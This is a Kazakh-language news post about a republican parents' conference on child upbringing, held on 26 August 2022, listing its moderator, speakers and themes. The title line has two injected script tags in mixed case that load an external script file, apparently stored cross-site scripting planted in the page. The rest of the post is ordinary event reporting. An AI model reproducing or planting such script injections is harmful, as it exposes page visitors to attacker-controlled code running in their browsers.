Республикалық ата—аналар конференциясы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.08.2022 Республикалық ата-аналар конференциясы. Саналы ұрпақ – ұлт болашағы Бүгінгі "Саналы ұрпақ- ұлт болашағы" атты Республикалық ата-аналар конференциясы өте жоғары деңгейде өтті. Болашағымыз жарқын болуы үшін «Сенімен болашақ» республикалық ата-аналар қоғамдық бірлестігінің негізін қалаушы, қоғам қайраткері Нұркен Асанов мырзаға айтар алғысым шексіз! Бүгінгі конференцияға ата-аналармен қатар өз ісінің шебері, мықты психологтар мен педогогтер қатысты. Олар ата-анамен тығыз қарым-қатынас орнату және баламен қалай тілдесу керек екенін, қарым-қатынас психологиясын жан-жақты түсіндірді. Конференция модераторы: Рамазанова Ләззат Керімқұлқызы – Қазақстан Республикасы Президентінің жанындағы Әйелдер істері және отбасылық-демографиялық саясат жөніндегі ұлттық комиссия төрағасының орынбасары. Спикерлері: ҚР Білім министрі Асхат Қанатұлы Аймағамбетов; ҚР Парламенті Сенатының депутаты Дана Нұржігіт Өмірбайқызы; ҚР ғылым және жоғары білім министрі Саят Нұрбек; Психология ғылымдарының докторы профессоры "Отбасындағы адамгершілік педагогикасы" атты тақырыпқа тоқталып толық мәліметтер берген Паата Шалвович Амоналивили мырза; Коммерциялық емес ұйымының директоры "Parents International" Eszter Salamon; Филология ғылымдарының кандидаты, абайтанушы, жазушы: "Отан отбасынан басталады" тақырыбымен Омар Жәлел Темірбеков мырза; Отбасылық психолог: " Жазасыз бала тәрбиесі" тақырыбын ашқан Ержан Мырзабаев мырзаға рахмет айтамын. Баланың ең бірінші ұстазы – ата-анасы. «Ұяда не көрсең, ұшқанда соны ілерсің» бала үшін әке-шешенің әрбір іс-әрекеті маңызды. Ата-ана отбасында бала тәрбиесіне ерекше көңіл бөлуі керек. «Сенімен болашақ» қоғамдық бірлестігі әрбір ата-анаға баласының Отанын сүйетін кемел және бәсекеге қабілетті тұлға, әрі адамгершілік құндылықтары жоғары болып жетілуі үшін жан-жақты қолдау көрсете отырып, еліміздің ата-ана болған әр азаматын осы ниетті қолдауға шақырады. Ата-ананың тәрбиесі – бала мінезінің іргетасы.
Просмотров: 439


Пікір қосу



Деректерді қолтаңбаға қосу